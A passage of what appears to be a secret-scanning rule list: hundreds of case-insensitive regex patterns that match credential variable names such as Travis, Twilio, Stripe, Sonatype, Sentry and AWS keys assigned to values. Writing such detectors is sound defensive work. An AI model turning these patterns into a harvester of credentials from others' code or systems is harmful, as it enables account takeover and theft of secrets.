\"(?i)[\\\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vip[_-]?github[_-]?deploy[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?v[_-]?sfdc[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?v[_-]?sfdc[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?usertravis[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?use[_-]?ssh[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?urban[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?urban[_-]?master[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?urban[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?unity[_-]?serial[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?unity[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitteroauthaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitteroauthaccesssecret[\\\"']?[^\\\\S\\r\n\n 
]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitter[_-]?consumer[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twitter[_-]?consumer[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twine[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?configuration[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?api[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?twilio[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?trex[_-]?okta[_-]?client[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?trex[_-]?client[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?secure[_-]?env[_-]?vars[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?pull[_-]?request[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?e2e[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?travis[_-]?com[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?branch[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?travis[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?token[_-]?core[_-]?java[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?thera[_-]?oss[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?tester[_-]?keys[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?test[_-]?test[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?test[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?tesco[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?svn[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?surge[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?surge[_-]?login[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stripe[_-]?public[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stripe[_-]?private[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?strip[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?strip[_-]?publishable[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?stormpath[_-]?api[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?stormpath[_-]?api[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?starship[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?starship[_-]?account[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?location[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?staging[_-]?base[_-]?url[_-]?runscope[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ssmtp[_-]?config[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sshpass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?srcclr[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sqssecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sqsaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spring[_-]?mail[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spotify[_-]?api[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n 
]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spotify[_-]?api[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spaces[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?spaces[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?soundcloud[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?soundcloud[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatypepassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?token[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?token[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?gpg[_-]?passphrase[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonar[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonar[_-]?project[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sonar[_-]?organization[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?socrata[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?socrata[_-]?app[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snyk[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snyk[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snoowrap[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snoowrap[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?snoowrap[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?slate[_-]?user[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?slash[_-]?developer[_-]?space[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?slash[_-]?developer[_-]?space[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?signing[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?setsecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?setdstsecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?setdstaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?ses[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ses[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?service[_-]?account[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?endpoint[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?default[_-]?org[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sentry[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendwithus[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sendgrid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?selion[_-]?selenium[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?selion[_-]?log[_-]?level[_-]?dev[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?segment[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n 
]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secretaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?key[_-]?base[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?9[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?8[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?7[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?6[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?5[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?4[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?3[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?11[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?10[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?1[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?secret[_-]?0[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sdr[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?scrutinizer[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sauce[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sandbox[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sacloud[_-]?api[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sacloud[_-]?access[_-]?token[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?sacloud[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?user[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?secret[_-]?assets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?secret[_-]?app[_-]?logs[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?key[_-]?assets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?key[_-]?app[_-]?logs[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 